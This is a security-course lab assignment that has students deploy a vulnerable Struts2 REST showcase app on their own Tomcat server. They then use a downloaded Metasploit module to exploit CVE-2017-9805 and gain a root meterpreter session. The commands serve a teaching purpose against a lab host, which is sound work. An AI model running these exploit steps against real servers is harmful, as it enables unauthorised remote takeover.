Project 10x: Exploiting Apache Struts2 with CVE-2017-9805 (10 pts. extra credit)

What You Need

Purpose

This is the new Struts2 attack, Disclosed: 2017-09-05 and reportedly used to exploit Equifax, though that claim has not been verified yet.

Downloading a Vulnerable Web App

On your host system, in a Web browser, go to:

https://mvnrepository.com/artifact/org.apache.struts/struts2-rest-showcase/2.5.12

Click the "Download (WAR)" link, as outlined in green in the image below.

You get a file named struts2-rest-showcase-2.5.12.war

Opening the Web-Based Administration Page

On your host system, in a Web browser, open this URL, replacing the IP address with the IP address of your Ubuntu server.

http://172.16.1.198:8080/manager

A box pops up asking for credentials. Enter these credentials:

Username: admin
Password: admin

In the "Tomcat Web Application Manager" page, scroll down to the "Deploy" section, as shown below.

If you can't open the manager page, check the log with this command:
nano /usr/local/tomcat/logs/catalina.out
When I did it, I had an error in the manager.xml file.

Deploying the Vulnerable Web App

In the "Tomcat Web Application Manager" page, in the "Deploy" section, in the "WAR file to deploy" section, click the "Choose File" button.

Navigate to your Downloads folder and double-click the struts2-rest-showcase-2.5.12.war file.

Click the Deploy button, as shown below.

The Tomcat page now shows the struts2-rest-showcase-2.5.12 application in the Applications section, as shown below.

Click struts2-rest-showcase-2.5.12.

A "Orders" page appears, as shown below.

In the top line, for client "Bob", click the View button.

An "Order 3" page appears, as shown below.

Notice that the URL ends in /orders/3 -- although those look like folder names, they are actually parameters in "REST" format.

The vulnerabilty we are exploiting is in the REST module.

Make a note of the portion of the URL after the IP address and port number--you will need it later. When I did it, it was:

/struts2-rest-showcase-2.5.12/orders/3

Searching for Struts in Metasploit

Launch Kali.

In a Terminal window, execute these commands to update Metasploit:

apt update

apt install metasploit-framework
In Kali, execute this command to launch Metasploit:
msfconsole
In Metasploit, execute this command to find "struts" exploits:
search struts
Several exploits are found, as shown below, but the module we need is not among them, at least on 9-8-17 when I did it.

Adding a Custom Exploit

On your Kali machine, open a new Terminal window and execute these commands to download the new exploit, which is still a Work In Progress:
mkdir -p .msf4/modules/exploits
cd .msf4/modules/exploits
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/2dfb1d4b5c4bfb05eef6dc45211c61466dd928a6/modules/exploits/multi/http/struts2_rest_xstream.rb
In Metasploit, execute these commands:
reload_all
search struts
The module appears, as shown below.

In Metasploit, execute these commands:

use exploit/struts2_rest_xstream 
info
Information about the module appears, as shown below.

Notice the "Available targets" section--Linux is TARGET 3. The other parameters we must adjust are RHOST and TARGETURI.

In Metasploit, execute these commands. Replace the IP address with the IP address of your Ubuntu server.

set TARGET 3
set RHOST 172.16.1.198
set TARGETURI /struts2-rest-showcase-2.5.12/orders/3
exploit
A meterpreter session opens, as shown below. Execute these meterpreter commmands:
systeminfo
getuid
As you can see below, you are now in control of the Ubuntu system as root.

Saving the Screen Image

Make sure the "struts2_rest_xstream" and "Meterpreter session opened" messages are visible, as shown above.

Save a whole-desktop screen capture with a filename of "Proj 10x from YOUR NAME".

Turning In Your Project

Email the image to cnit.124@gmail.com with a subject of "Project 10x from YOUR NAME".

Sources

Struts 2 Getting-Started on Ubuntu 14.04 Trusty LTS Linux Easy Guide
Apache Struts Jakarta Multipart Parser OGNL Injection
How can I install Sun/Oracle's proprietary Java JDK 6/7/8 or JRE?
Maven 3 How-to Generate a Java Web App Project on Ubuntu Linux Easy Guide
Struts 2 Blank Archetype
How does one set up/install struts on Ubuntu or a Nix machine?
Maven can't find Struts2 dependencies
Apache Tomcat 8 Apps Manager Quick-Start on Linux/Unix
CVE-2017-5638 - Apache Struts2 S2-045
Add Apache Struts 2 REST Plugin XStream RCE #8924
documentation/modules/exploit/multi/http/struts2_rest_xstream.md
Loading External Modules

Posted 9-8-17 by Sam Bowne
Revised 9-9-17 12:13 pm